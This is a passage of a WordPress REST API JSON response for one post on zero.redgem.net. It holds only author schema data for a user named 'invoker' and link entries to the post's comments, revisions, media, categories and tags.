redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/48981","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=48981"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/48981\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=48981"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=48981"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=48981"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}